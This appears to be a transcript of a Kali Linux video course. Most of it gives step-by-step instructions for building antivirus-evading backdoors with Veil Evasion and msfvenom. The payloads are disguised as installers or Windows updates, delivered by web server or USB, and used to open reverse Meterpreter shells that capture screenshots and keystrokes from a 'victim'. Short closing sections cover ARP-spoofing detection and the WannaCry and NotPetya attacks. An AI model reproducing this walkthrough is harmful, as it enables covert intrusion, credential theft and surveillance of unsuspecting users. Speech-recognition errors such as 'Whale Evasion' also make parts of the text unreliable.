Hello and welcome. In this video, let us take a look at generating an undetectable backdoor in Kali Linux. Generating an undetectable backdoor in Kali Linux involves creating a convert method for gaining unauthorized access to a system while evading detection by security software. So this means that we will be creating a small virus or malware which does not get detected by the modern antiviruses like Avast, Norton, or McAfee, and which will bypass Windows Defender. So if it bypasses Windows Defender, we can send the files online through various techniques like from Gmail, or you can just use a pen drive and insert it into the target computer, and you can just get a lot of information from that, and you can just run the backdoor in the targets file, and you can get a lot of data, screenshots, and what they are doing. So this process typically uses tools like MSF Venom, a part of the Metasploit framework, to craft a malicious payload that can be embedded into legitimate files or applications. By obfuscating the code and using encryption techniques, attackers can create a backdoor that bypasses antivirus programs and other security defenses. Once the backdoor is delivered and executable on the target system, it allows the attacker to establish a remote connection, often using reverse shells or other communication channels to control the system without the user's knowledge. So once the backdoor is in their system, once the payload is in their system, the user does not get informed by any antivirus, because the antivirus does not detect the virus. So that will be a great advantage for a hacker. And this access can be used to steal data, install further malware, or maintain long-term persistence on the compromised machine. To avoid detection, attackers might use techniques like polymorphism, which changes the appearance of the malware with each execution, or packets which compromises the payload to alter its signature. And we can even keep copying the virus again and again once it is in their system. Preventing such attacks requires robust endpoint protection, regular security updates, and vigilant monitoring of network activity to detect unusual behavior indicative of a backdoor, and understanding how undetectable backdoors are generated and the risks they pose is crucial for defending against this advanced form of cyber threats. So there are many backdoors which can be created in Kali Linux with the help of Metasploit and MSF Venom, which is a part of Metasploit framework, and there are many GitHub tools where you can download them and run them. So we'll be using a tool called Whale Evasion in Kali Linux. So Whale Evasion is a tool in Kali Linux used to generate payloads that bypasses antivirus and security defenses. By obfuscating and encrypting payloads, Whale Evasion creates executable files that evade detection by appearing harmless to security software. It offers various payload options such as reverse shells and meter-created sessions, allowing remote control of a compromised system once executed. Integrated with the Metasploit framework, a whale evasion is commonly used by ethical hackers to test against a system's defense and demonstrate how malware can evade detection. However, it can also be misused by attackers to create an undetectable malware and spy on the target computer, and highlighting the need for advanced security measures like behavior-based detection and regular updates of the operating system. And understanding whale evasion is crucial for defending against sophisticated threats and strengthening an organization's security posture. So, yeah, I hope you understood what a backdoor is and how to create it in Kali Linux. So in the next video, let us take a look at how to create a backdoor using the software called Whale Evasion. So I'll see you in the next video. Hello and welcome. In this video, let us take a look at how to install Whale Evasion in Kali Linux. So open up your terminal. I'm in my root account, so you can just check in which account you are in by just typing who am I, and make sure you just you know take a note of the IP address, which is 192.168.0 and 109, which is the WLAN zeros IP address. And once you have a note of all of that, you can just start the attack. So for that, you'll just need to install Whale Evasion, and I have a set of commands written in my notepad. So you can just follow all of the commands and install Whale Evasion. I've just written it down so that it will be very handy, and we can just start the attack. So I have already installed Whale Evasion, but for you, you just type cd desktop and just type the next command. Type sudo apt install Whale Evasion. Copy this in your terminal and just paste selection, paste clipboard and hit enter so that the Whale Evasion starts installing. Or you can just type sudo apt install Whale. So Whale is a software which is used to create payloads, and there are different kinds of payloads written in Python, C, Go programming language by Google, which is a high level programming language, and Ruby. So after that, you just need to type Whale Evasion to run, or you can just type Whale to run the software. And before doing that, you just need to copy this in your terminal. A user share Whale config setup force silent. You just need to copy this and run this, and make sure that if you run this, you will not get any kind of errors. And make sure you have Python 3 setup and Wine, because Whale is written in Python and Python is necessary to run Whale. So I'll just clear my terminal and type Whale in from my root account. So this is Whale for you, and you can just type update to update Whale, and I think I have the latest version, so which is 3.1.4. You can take a look at the Whale's website, and you can take a look at their Twitter handle. So yeah, you can go ahead and start creating your payloads, and you can take a look at two tools loaded from the main menu and available tools. We are going to use evasion, and the list of commands, exit to completely exit Whale, info to get all the information on the specific tools and the payloads, and list to list out all the tools and options, show Whale configuration, and update. I just said update, so you can just update the Whale to the latest version, and use you can use the tool. So just type use one, and so you can just start using Whale. So it says 41 payloads loaded, and it says Whale evasion menu. So you can take a look at all of the commands right here, which is the most useful commands. And it says check for viruses, where we can just test our viruses online. So there's a website called virustotal.com where you can just upload your payloads or viruses online, and you can just start checking for any kind of detection. So this website lets us detect the second.com. Okay, so this has multiple viruses, probably around 30 or more than 30 antivirus softwares, which helps detect other payloads or malware. So I recommend you not to upload our payload in VirusTotal and scan it, because if you submit it here, they will find a way to reverse engineer and encrypt it. So it is better not to upload your payload here. So you can take a look at the website. It analyzes suspicious files, domains, IPs, and URLs to detect malware and other breaches. You can hit on choose file. If you hit on choose file and upload the payload, it will obviously detect, or you can just use the check VT command, clean to remove the generated artifacts, exit to completely exit Whale, and list to list the payloads. So just type list and you will get n number of payloads right here. Go is a Google's programming language, which is programmed by Google, because it is high level programming language. It is very hard to detect. And yeah, and we have Python, PowerShell, we have Ruby, and we have CS, we have auxiliary, and these are the different kinds of payloads which we can create and attack our operating system. So we can just go ahead and use the meter session, which is 25, or a reverse meter session. So we can go ahead and start the Python meter reverse tcp.py. So you can go ahead and just type 28, or you can just type use 28, so that it will go ahead and create, or we can just go ahead and use the meter reverse http py, which is 9. So you can just type use 9, and it will create you a payload. So yeah, you can just start ahead and create the payload and set the L port. So in the next video, we'll go ahead and start creating the payload, and we will transfer the payload to the host, to the Windows operating system, which is this. And you can go ahead and download the payload from Google or any other browser, because we will be uploading the payload from Kali Linux to Apache server, and we can download it right from there. So in the next video, we'll create the payload and install it in our Windows operating machine and start testing it. Let's continue from where we left off. So this is the L port 8080, port of the Metasploit handler, and we need to set the L host IP of the Metasploit handler. So we just need to remember our IP address, which is 192.168.0.109. If you don't know your IP address, open up a new terminal and check for WLAN 0. And my IP address is inet. This is the IP address of the wireless network adapter. So I'll just copy this, copy selection, and I think I'll just close this for now and paste it right here. You can just type set L host with Control V, and type info, so that just to check if the L host is set. So 192.168.0.109, and you just type generate, so that the payload gets generated. And you can just give the payload a name. I'll just give it backdoor.exe for now. Yep. So you can just name it whatever you want to. You can just name it as Python py, or update Windows, or Windows update, so that the victim does not suspect it. So you can just provide it whichever name you want to, and hit enter. For now, we have just given it as backdoor.exe. Usually exe files are very easily noticeable by antivirus systems. So I just tried this attack 10 minutes back, and my Avast antivirus was able to capture this. So we have successfully created the executable file, which is written to this location, and hit copy and open up your folder and just paste it right there. And once you Control V, and I'll just cancel this, hit enter. So we have the backdoor.exe, hit properties, and I'll just remove the exe twice, or you can just leave it right here. Okay, close. Let me remove the exe. So this is our backdoor, this is our payload or virus. So it is a 32.8 gib, size is 6 gib, 6144 bytes, created today. You can take a look at all of the details and the permissions, which is root and read only. So you can just go ahead and paste this in your Apache server. Copy and open up a new folder and search for Apache server var www.html slash, hit enter, and you can just paste it right here. So once this is pasted, you'll just need to open up Google Chrome in the Windows operating machine, in the attacker's operating machine, and you can just start the attack. So I just exit fail evasion for now, clear, get back to your root terminal, hit clear, and you just need to start MSF console. And I'll open up my Google Chrome in Windows. So I have just opened up Google Chrome in my Windows operating machine, and you just need to download the payload from here. So just type just type http 192.168.0.109 slash backdoor, and the name of backdoor exe, I think it was 1, and hit enter, and it has to go ahead and download all of the backdoor file. So it says save type as backdoor exe1, and it has to download. I have gone ahead and disabled my Avast antivirus with keep. So antivirus system, I have disabled all of the behavioral shield, web shield, mail shield, and file shield, and I have gone ahead and disabled the firewall also. So it just because it is a exe file, antivirus and Kaspersky or any other antivirus can easily detect it. But yeah, and I think even Windows 10 can detect it. Once you double click this, it starts running, and once the program starts running, you can just go ahead and open up MSF console from your Kali Linux machine. And once MSF console opens, you can just set the payload and lhost and hit exploit. So yeah, so even MSF console or Metasploit has a lot of exploits and payloads. You can take a look at the payloads. It has 1471 payloads where you can just go ahead and attack a Windows operating system. So it says MSF 6, and you can just type set payload, and you can just set the payload to Windows Meterpreter session. So you can just go ahead and type Windows Interpreter reverse TCP HTTP, and hit enter, and it is set, and hit on show options. So it just gives you the set of options right here, and you can just set the lhost to 192.168.0.109, which is an IP address of Kali Linux, and hit enter and type exploit. Okay, it says unknown command for now, but I think you just need to start the I just forgot, you just need to start the multi-handler before using it. You just need to type use exploit multi-handler and hit enter. And now once we started the multi-handler, I'll just copy this for now, paste it right here, please clipboard, hit enter, hit on show options, shift control V to show the different kinds of options. So the lhost is set and the local port is set to 8080, and now we just need to go ahead and hit on set lhost, yep, and hit exploit. Okay, I think the interpreter session has started running, and let's just wait for this. And once okay, I just started HTTP, and once the victim double clicks the file, it just go, the attack just starts right here. Once the attack starts, the victim can get the entire access of the Windows operating system from here. So this is how you create a payload and send it to the victim. You can just send it however you want to, from a pen drive. If you try to send it through Gmail, probably Google's detection system will detect it. And if you just double click this exe, I think this exe is not executable for now because it has a .1 right here. You can just create a new exe file. I don't know why it is named exe.1 because I had created exe. You can just go ahead and delete this and create a new exe file, send it to the system, because now you know that how to send it. And once you double click this, the interpreter session starts right here. Once it starts, you have the full access to the computer system. You can just go ahead and delete that file. I'll just delete this exe. I'll just end this session. I'll just clear. I'll just exit Metasploit, and you can go ahead to Whale and create a new payload and name it as a Python py, or name it as virus, or name it as update.exe, and send it to the victim's computer, and download it from here. So I'll see you in the next video after I get the complete access. So in this video, let us take a look at how to create a fail evasion payload, but with a different name. So I have gone ahead and created a fail evasion payload with the name called python.exe. If you want to follow, you just type in whale, and you just type use one, and you just type in, if you type use one and if you enter list, it just gives you the list of different kinds of payloads which exist. And type use 9 to use the interpreter TCP. Where is 9? So we have it is coded in CS, and interpreter reverse HTTP .py. It is written in Python language. So yeah, and it just goes ahead and gives you the payload, and you just need to set the local host. Okay, we just need to set the local host to 192.168.0.109 and hit on info if local host is set to 192.168.0.9, which is your IP address of Kali Linux. So once this is set, you just need to go ahead and hit enter, and you just need to paste the local host into this folder. You just need to paste the payload into this var www.html, and you just need to copy this and paste it there in this folder, in the Apache folder, and you just need to run Apache web server. And yeah, you just need to type in service Apache 2 start, and once it's started, you just need to open up Windows operating system, which is the attacker's mission, and make sure you just install the payload. So just type http 192.168.0.109 dash. My name, the name I've given to the virus is Python, and hit enter. So this is an executable file, so it just goes ahead and asks me to download, and it says save file as application, and hit save, and hit on keep, because Google Chrome detects it as an exe file, and most of the exe files are virus. So this is an executable file. If the victim double clicks on this, it is saved in local disk C, double clicks, the session starts right here. Once the session starts right here, you just need to go ahead and enable MSF console and hit enter. So if the session starts, we have the full access to the victim's mission. I have gone ahead and disabled all of my firewall and antivirus because it is very easily detectable because of the exe file coding. So once Metasploit starts running, you can just go ahead and start the multi-handlers session. And once the session is started, you can just go ahead and attack. Okay, use exploit. You will get many errors here and there regarding whale evasion and Kali Linux. You just need to make sure that you update your system with the apt-get update command. And for whale evasion, you can just use ChatGPT and fix your errors. I faced a lot of errors while installing whale evasion, but I just used that one command and fixed all of it. And I have the command right here. Okay, I'll just write it down and show it to you. But for now, let's go ahead and let's continue our attack. Okay, I have two terminals open. You can just set the payload to Windows, Interpreter, reverse HTTP, and hit on show options. Okay, and you can just set the local host to 192.168.0.109. Hit enter and once you have done all of this, the attack just starts. And if I double click right here, and yeah, Windows will give you a warning saying that don't run. Microsoft Defender Smart Scan prevented an unrecognized app from running at this moment, and which might put your PC at risk. Click on more info because it is an unknown publisher, and hit on run anyway. And once the exe file starts running, we have to get a connection right here in Metasploit, and I think we just need to wait for any kind of connection. Once it is connected, it will start the Meterpreter session right here. And once the Meterpreter session is started, we are good to go. You can use the show commands option, and you can just start attacking the system. You can take screenshots, you can do whatever you want to, but it has to get connected to the Meterpreter session. So I'll see you in the next video. Hello and welcome. In this video, let us take a look at how to create a payload using whale evasion, and we will be creating a Python payload using the Meterpreter session. So just type in whale, and the whale evasion graph opens up, and you know what to do. Just type use one. We will be using evasion, and just type in a list. You get a lot of available payloads which are written in different programming languages, but for now we'll be using the Python Meterpreter reverse tcp.py. And once you hit enter, you just type in use 28. So if you just type in use 28, you just use the Python Meterpreter reverse tcp.py. And once you press enter use 28, it just goes ahead and creates a Python payload. But before that, you just need to set your local host, which is your IP address, and the L port is 4444, which is the listening port, and hit generate. Once you hit generate, whale evasion and goes ahead and creates the payload. And just hit Python py installer 1. After pressing this, it just creates the payload, and it just creates an executable file. and it is written into the pipe into this folder. Just create copy selection and hit on folder. The executable file is written here, and go ahead and open up your folder and just paste in. Okay, it says executable file written to, hit enter. Or let me just cancel this. Let me just close this and let me open it. Let me open my home directory from here. You can just copy this, copy selection, and paste it right here. Okay, we have the Python setup, which is written in .exe, and this is where social engineering takes place. If you just type in backdoor or virus exe, the victim will get to know. So you just type Python underscore setup.exe x86 or given Windows update.86. So we will need to transfer this to the Windows operating system. And once you transfer this to the Windows operating system, you just need to execute it and you just need to start the MSF console. Let's go ahead and do that. So yeah, once you create the payload, you just go to the file directory and paste it right here. Control V to paste it. Let me just cancel this and hit enter. You just need to copy this to the victim's computer, to your Windows 10 operating system. And I have just used a USB flash drive, and when you connect your USB flash drive, your USB flash drive pops up here, and you just need to hit the tick mark you just need to hit the tick mark so that it will get connected to your virtual box Kali Linux operating machine, and you will get a new device here. You'll just need to copy this file and hit on copy, and you can just paste it in the pen drive, and hit on devices again and disconnect it from right here by removing the tick mark, and you just need to paste it in the operating system of the victim. And once it is pasted, it just looks like this. This is the Python setup file, and I don't think Windows detects this as a virus. You will only know if you run it. And yeah, so it just looks very legitimate to me. So this is the virus or the payload. This is one more way of copying. You can just give your USB drive to someone, your friend or the victim, and you just need you can just go ahead and start the attack and copy the virus or the payload in their system. So you just go ahead and start the interpreter session right here. Once the session is started, open up a new terminal and type in MSF console and start the session. So you can just go ahead and open up a new terminal and type in MSF console. Once MSF console is typed, the software starts, and you just need not type MSF console in while evasion. Open up a new terminal and type in MSF console. I've just run the attack. You just need to double click on the py file after running the commands in Metasploit. So yeah, you just need to use exploit multi-handler. Once you use the exploit multi-handler, it just says using configured payload. Just type in use exploit multi-handler, and once you type exploit multi-handler, you just need to select the payload Python interpreter reverse TCP. Once you select the Python reverse interpreter TCP, you just need to use the payload. Once you just start using the payload, you just need to set the local host to 192.168.0.109, which is the IP address of the Kali Linux operating system. Once you use the payload, it says local host, which is set to 192.168.0.109, and hit on run. Once you hit on run, you just need to minimize the Kali Linux operating machine, and you just need to double click on the py file and hit S. you will get a prompt from Windows stating that this is an unknown publisher, and hit on S. Once you hit on S, the Meterpreter session starts opening up. Once the session starts, you just can start using the payload and get access to the entire system. Just type in system info to get all of the system info. So you will get Meterpreter session right here, like this, instead of MSF exploit multi-handler. I just closed the session for now. So the session has started, and you'll just get a Meterpreter session. So just type system info. From typing system info, you'll get the operating system, which is Windows 10. You'll get the computer name, you'll get the domain, and you'll get the architecture and system language and other stuff. So there are n number of commands which can be used. I'll just hit exit and clear this and close this terminal. And you can use various types of payloads from whale evasion. Type in list, and you can even use Ruby, which is very hard to detect. And you can use Perl, you can use Go, but these payloads are very complex to configure and transfer it. You can easily configure, but it is very hard to create and very difficult. You can just go ahead and create payloads and use the same methods. You can just type in help to list out the different kinds of commands to take snapshots and stuff. And that is it for now. And if you want to test the payload, you can just open a VirusTotal and upload it on VirusTotal. So you can use the Python setup, and you can just upload it into the VirusTotal website. So let us go ahead and try to do that. I'll just copy it and paste it on desktop. Okay, we have it here. Open up. It might detect or it may not detect, and so let us go ahead and give it a try. Let's go ahead and VirusTotal, but I think it might detect. So yeah, mostly Python setups are not detected, but let's go ahead and test. But if you try to attack the victim, I don't think Windows 98% of the time Windows Defender may not detect it, but Avast or Norton or McAfee might detect it. So the maximum file size is 650 MB. Hit open and confirm upload. So let us check if it says I am not a robot. Car. Is this a car? Okay. Hit on verify. Once it is verified, it just goes ahead and scans. Okay, this did not work. Let open again. Hit confirm upload. It says uploading. Okay, I think it is less than 650 MB, or I think it is less than 5 or 10 MB for now. And once it is uploaded, it just scans with the multiple. Yep, it is running. It just scans with multiple antivirus software. It says undetected. Okay, it says detected. So if your payload gets detected by the payload is patched and updated, I think it will be even updated by Windows Defender. If the payload gets detected, you can use many other payloads from Metasploit or from Whale Evasion or from MSF console and create a new payload and run the payload. So it says Trojan from Avast. So the payload is completely patched. I think it is very famous for now. So from Bitdefender, most of the famous antivirus detected. Malwarebytes sees this as a malware, and Google detected it. So you just cannot transfer it from Gmail, or you can very difficult to download it from Chrome. And other antivirus software sees undetected, and Avast Mobile unable to process the file because this is not compatible with mobile. And Cyber Reason, Max Secure, and all of them sees a Trojan. Some sees it is malicious file, some sees hack tool, some sees some of the softwares sees it as a malware. And yep, you can take a look at the details, behavior, and community. You can take a look at the encryption. You can look at the executable type and combine languages. And you can take a look at the name of the virus for the payload, which is python setup.exe. Okay. 35 security vendors flagged this file as malicious. So yeah, out of 75, antivirus software. So the size is around 4.55 MB, which can be easily transferred to the victim. You can just if you have the access to the victim's computer, you can go ahead and disable this antivirus and start the session, interpreted session right here. Let's go ahead and hit on behavior. Okay, it's still loading. So yeah, so this is how you go ahead and create a payload, and you can just test the payload if it is detected by most of the software. I think even Norton antivirus can easily detect this. So I'll see you in the next video. Hello and welcome. In this video, let us take a look at how to capture or how to hack a Windows operating system from MSF Venom. So turn on your Kali Linux and follow the commands. So we need to create a payload using MSF Venom, and I have written down all of the commands, and it will be handy for you if you just take a screenshot of this. So you need to create a folder on your Kali Linux operating machine, and let us get into the desktop directory, and let us go ahead and create a temp folder right here. Right click and click on create folder so that the payload will be saved here. So yep, it will be saved on desktop, and it will be saved inside this temporary folder. So just type temp, and if you type ls, there's nothing inside the folder because it is a empty folder. We just created it, and the payload will be saved right here. So you just have to create the payload using the msf command. So I'll just copy this and paste it in terminal. I have just conducted the attack previously before recording the video. So yeah, this is MSF Venom, and P for the payload. We will be using Windows Interpreter reverse TCP, and the local host is your Kali Linux IP address 192.168.0.109, and we need to specify the L port as 4444, and the type is exe, and the file name is payload.exe. Once you hit enter, it will just start to create the payload, but we just need to wait for probably 10 seconds. Okay, it was very quick, and it is saved inside the temp file on desktop. You can take a look at all of the details right here. Once it is saved on the desktop, you just need to upload this in your Apache web server. So you can take a look at the payload, hit on properties, and it is a .exe file, so Windows Defender can easily detect it. And my victim machine, I've just created a Windows operating machine, and I've just installed a Windows 10 operating system in my Kali Linux. So this will be my Windows target machine. So I will be installing the virus here. Before that, we just need to upload this payload in our Apache web server. So let me just copy this, copy, close this for now, close this for now, click on home, and just type var www html and hit enter, and you can just paste the payload right here. And let me just close this and open up a new terminal and start your Apache web server. Service Apache 2 start, hit enter so that the Apache web server starts, and head over to your victim machine and download the payload right here. Open Google Chrome type http and make sure that in real life while you log into your Facebook account or Gmail account, and make sure you have https because it is more encrypted than http. 192.168.0.109. So we will be installing the payload right here. So I've just gone ahead and disabled it's commonly downloaded. Microsoft it is just saying that payload exe isn't commonly downloaded. Trust payload.exe. Yep. I'll say keep it. Hit on show more, and I have gone ahead and disabled Windows Defender just for the testing purposes. So I've just clicked on protection history, and I've just disabled the firewall, and it says turn on. Your real-time protection is off. So yep, hit on this. Hit on keep anyway, so that it will download. Hit on the folder. It is saved in the download session. If you double click this and run it, it will start the attack, or the meterpreter session will be started. After this, you just need to you just need to open up MSF console and make sure that the meterpreter session is connected with the victim and the hacker, so that the session is connected between the Windows 10 operating system and Kali Linux. And we just need to double click on the payload so that it starts running. Once this is open, we can go ahead and use exploit multi-handler. We just need to wait for a few minutes. Yep, we're good to go. Type use exploit multi-handler. So we are into the multi-handler, and you just need to set payload to Windows TCP, and you just need to set the local host to your IP address, which is 168.0.109, and the local host is successfully set. And set L port to 4444 and hit enter, and you just need to hit run, and it will start the attack. And we just need to run the payload on the Windows machine. So once this is started, we are good to go. Okay, it says started reverse TCP handler, and let me just run this payload. It will give us a prompt saying that don't run, but hit on more info. It says unknown publisher. Yep, Windows detects this as a virus. Hit on run. So once you hit on run, I think the meterpreter session has to be started. Yep, we are good to go. We are in the meterpreter session. Once this is started, you can just type help. We are in the Windows operating system successfully. So we can do anything we want to out of so many commands. You can take a look at the commands. You can look at the current background session if you just type background. If you type system info, this info, you'll get all of the information about the computer. So logged on users, you get the system language, you get the OS, you get the computer. You can even take snapshots with the snapshots command, and you can take a look at the webcam commands. You can record mic, although mic is not connected to the operating system, and I don't even have a webcam connected. But if you have a webcam, you can just type the command, copy this command and paste it. It'll take a snapshot from the specified webcam. If it has multiple webcams like 1, 2 or 3, you can just name it. And for now, let us just take a snapshot. Okay, I just need to search for the command snapshot. Yep, it is a screenshot. Okay, copy text, grab a screenshot from the interactive desktop, so it will be saved in your Kali line. Let me just paste it. Hit enter. So yeah, screenshot is successfully saved. So I'll just copy selection and open it in my home directory. Okay, yep, we have successfully captured the screenshot. So this is how it looks. So yeah, we had opened up my computer and downloads. So this is how you hack a Windows operating system using MSF Venom. And you can even use different tools like Saint and Whale Evasion. You can even take the key loggers. You can take the keystrokes such as key dump, which sends the keystroke. You can start a key scan, which starts capturing the keystrokes, and you can type ls to list uh, the files, and you can just type pwd for the working directory where our payload is downloaded. It is in C users guest and download. You can type ipconfig to get the info of the Windows operating system. Okay, I think it is if. Yep, ifconfig, so that we'll get a lot of details regarding the IP address. Once this is done, you can just go ahead and play with all of the commands. Let us try keystroke. It might work, and sometimes it may not work, but we just need to keep trying. Copy selection and paste selection. So you have n number of commands which can be used against the Windows operating system. Starting key sniffer. Okay, so yeah, this is how you can. Let me just close it. Hello, this is okay. Let me just close this. This is UI. I think keystrokes has to be recorded right here. So all of the keystrokes we type, like the passwords and the usernames, the victim types, it will be recorded. So you can start capturing the key scan. Key sniffer start. Let us just stop the key sniffer. Copy selection and paste it right here. Shift Control V. Okay, it is stopped, and yeah, you can just go ahead and open that. So yeah, this is how you get a control of Windows operating system, and I'll see you in the next video. Hello and welcome. In this video, let us take a look at detecting ARP poisoning attacks in Kali Linux. Detecting ARP poisoning attacks in Kali Linux involves monitoring network traffic for suspicious ARP activity that indicates potential spoofing. Tools like Wireshark and Ethercap are commonly used to identify inconsistencies in ARP requests and responses, such as multiple IP addresses associated with a single MAC address. Wireshark can be configured to capture and analyze ARP packets, allowing users to detect anomalies like duplicate ARP replies and unsophisticated ARP responses, which are typical signs of ARP poisoning. ARP Watch is another tool that monitors ARP traffic and alerts users to changes in MAC IP mappings, helping to identify potential spoofing attempts. In addition, XARP is a specialized tool designed specifically to detect ARP poisoning by continuously scanning the network for irregular ARP behavior. And by regularly monitoring the network with these tools, the system administrators can quickly detect and respond to ARP poisoning attacks, minimizing the risk of data interception and other malicious activities. Implementing these detections strategies is essential for maintaining key integrity and security of communications. So we have just downloaded this image, and you can take a look at we are in between the a victim and the router where all of the traffic is passed through us. So yeah, we can take a look at all of the data which goes from the victim to the router to the internet, and from the internet to the router to the victim. So we are in the middle, and this is a MAC address which is associated with the client and the router. So this is how a ARP, a spoofing, or a man in the middle attack works. And turn on your Kali Linux, or you need not turn on your Kali Linux. So I've just opened up terminal. So type ifconfig, and you will get the MAC address of WLAN 0, which can be associated with the Windows or the target operating system. So if you type ARP in your CMD, so this is the physical MAC address, and this will be replaced by the MAC address from the Kali Linux. So you have a software in which you can download to monitor if you're being attacked by ARP spoofing. So turn on your Google and head over to the website XARP and download the software. So just search for XARP, and you can just download it from the Softonic website. This is the first link, and make sure it is HTTPS and you are secure. So hit on free download and just install the software. Once you install, you just need to run it, and yeah, we are good to go. And if you encounter any attacks, okay, found no network interfaces, you are running. So if you find any attacks, the IP address, MAC address, host, vendor, interface, online cache, first seen, last seen, how often. So you can everything will be seen here. So it says that, let me just restart this. Okay, found no network interfaces. You are running XARP with enough privilege. I think we have to run it with administrative privileges. So you can even set the aggressive level. So if there is an attack, you will get a into mark or a cross symbol with red color, and if there is no attacks or everything is fine with no suspicious activities, you will get a tick mark like this. So every time you cannot open up your CMD and type ARP-A and check for the MAC address. You can run this XRP-A and make sure everything is fine. So you can set the security level to basic, high, and aggressive. I recommend aggressive every time just to stay on the safer side. So the basic security level operates a default attack detection strategy that can detect all standard attacks. This is the suggested level for a default environment. So this is how you use the software, and you just can stay safe from the basic ARP relay attacks or ARP poisoning, which can be done from Kali Linux or any other software out there from any operating system. So yeah, I'll see you in the next video. Hello and welcome. In this video, let us discuss about some of the biggest cyber attacks in the world. So, WannaCry ransomware attack 2017. WannaCry was a ransomware attack that targeted computers running the Microsoft Windows operating system by encrypting data and demanding ransom payments in Bitcoin. So this virus, or ransomware, it spread rapidly using the Eternal Blue exploit, a vulnerability in Windows Server Message Block (SMB) protocol. So the attack affected more than 2 lakh computers across 150 nations, including systems in the UK National Health Service (NHS) and Spanish telecommunications firms like Telefonica and FedEx, which is a logistics and delivery company. So this ransomware attack spread across all of the computers with the exploit which was found. So the vulnerability had been previously discovered by the NSA and leaked by the shadow brokers hacker group. So the vulnerability was initially discovered by the NSA, and the cyber criminals used to create a worm-like ransomware that spread across all of the networks and encrypting it. So this is how the decryptor looks, and you will need to pay certain amount so that your system gets unencrypted. So the decryptor key looks like this. So oops, your files have been encrypted, and you can select the language. The user interface is pretty good. So it says payment will be raised on and time left, and if you don't pay, it says that within this time your all of your files will be lost. So this was the case back in 2017. So yeah, it says not enough time left. You can decrypt some of your files for free. Try now by clicking on decryptor. But if you want to decrypt all of your files, you will need to pay. You only have 3 days to submit the payment. After, the price will be received. Also, if you don't pay within 7 days, you won't be able to recover your files. We will have free events for users who are poor that they couldn't pay. And you can take a look at the payment gateway. It only says Bitcoin. So Bitcoin uses blockchain technology, and it is a bit difficult to track the Bitcoin address. So they'll even give you a Bitcoin address. So send 600 worth of Bitcoin to this address, and as soon as you turn on your computer, this message pops up, and only if you pay, you'll get the decryptor key, and you can decrypt it with the key. So yeah, and they even have all of the instructions. So how do I pay? Payment is only accepted in Bitcoin. For more information, please check the current price of Bitcoin and buy some Bitcoins. And after the correct amount, so once the payment is checked, you can start decrypting your files immediately. So this is how the decryptors look, and we strongly recommend you to not remove the software and disable for a while until you pay and the payment gets processed. If your antivirus gets an update and removes the software automatically, it will not be able to recover the files even if you pay. So the main purpose from shadow brokers was to gain money, and they did make a lot of. I think they got millions of bitcoins, or they made a lot of money from this. And you can take a look at about Bitcoin and how to buy Bitcoin. Contact us. They have given all of the information, and many big organizations and businesses were targeted, and victims and businesses were paying these hackers. So yeah, this is how attack is made. So in the next video, let us discuss about the NotPetya ransomware attack. In this video, let us take a look at NotPetya ransomware attack, which was caused in the year 2017. The NotPetya initially appeared to be a ransomware, but was later revealed to be a wiper designed to destroy data rather than encrypt it for ransomware. It also exploited the Eternal Blue vulnerability similar to WannaCry. The attack began in Ukraine, targeting banks, airports, and critical infrastructure, and quickly spread to major global companies like Merck. So this ransomware caused over 10 billion in damages, making it one of the costliest cyber attacks ever. Unlike WannaCry, which primarily aimed to extort money, NotPetya seemed to be a politically motivated attack, with Ukraine being the primary target. The viper nature of this ransomware meant that data was irreversibly destroyed, causing significant operational disruptions for the affected organizations. The attack highlighted the potential for cyber warfare to cause large-scale economic damage and destabilization of governments or countries. So this is how the NotPetya ransomware looks like. So you can take a look at, oops, your files are encrypted, and if you have seen this text, then your files are no longer accessible because they have been encrypted, and you can only decrypt it with the decryptor key. And please follow the instructions, send 300 of Bitcoin to the address. And the main purpose was not money, but their main purpose was to send a message or destroy the data of businesses and the victims which are attacked. So this is how it looks, the main goal. And next we have the Yahoo data breach, which was in the year 2013 to 14. So Yahoo disclosed two major data breaches affecting all 3 billion user accounts. The first breach in 2013, discovered in 2016, compromised names, email addresses, dates of birth, and hashed passwords. The second breach in 2014, which was discovered in 16, also included security questions and answers. The breaches were attributed to state-sponsored actors and led to significant financial reputational damage to Yahoo, impacting its acquisition. So yeah, so you can take a look at the notice of data breach. So ethical hackers and cybersecurity, uh, experts and good antivirus systems are very important for a company so that it does not get attacked. And the most important is not to get attacked by outsiders and remove the internal threats. And the most important thing for the cybersecurity team is to mitigate the attack for a company and minimize the attacks. So up next we have WazirX, which is a Bitcoin exchange in India, faces major security breach, which is 235 million in cryptocurrency stolen by hackers. The platform affected is WazirX, a popular currency exchange. Nature of breach: unauthorized access to the platform system. Funds involved, approximately 235 million worth of cryptocurrency was moved or stolen. So you can take a look at what happened. Breach discovery: WazirX identified a security vulnerability of breach that allowed unauthorized parties to access and move a large amount of funds. So the main goal is to prevent the attack before happening and to fix all of the vulnerabilities in the system. The funds movement: the breach led to the transfer of 235 million in cryptocurrencies, which could include various digital assets such as Bitcoin, Ethereum, or other tokens. Immediate actions: transactions freeze, user alerts, and investigation. The platform, along with cybersecurity experts and potentially law enforcement, would have launched an investigation to understand how the breach occurred and to track the stolen funds. And user alerts: affected users would have been notified about the breach, advising them to secure their accounts and monitor for unusual activities. So yeah, potential implications for users, for the platform, and for the crypto market. Such incidents can lead to increased scrutiny of cryptocurrency exchanges, potential regulatory challenges, and shifts in user trust and market sentiment. So WazirX may need to address many different vulnerabilities, improve its security measures, and restore user trust. This might also face regulatory scrutiny and legal consequences depending on the breach's impact and their response. So preventive measures: enhance security and user vigilance. And conclusion: so exchanges need to implement robust security system measures, including regular audits and encryption and multi-signature wallets and two-factor or authentication. And WazirX breach underscores the importance of cybersecurity in the cryptocurrency industry. It highlights the need for both exchanges and users to remain vigilant and proactive in protecting their digital assets. So this is how hackers try to find a vulnerability in a business or a software, and they just use it for their benefit. So proper update of systems and networks can prevent this, and good ethical hacking or cybersecurity team is needed. So I hope you got a brief understanding on how all of this is done and some of the major attacks and data breaches. So I'll see you in the next video.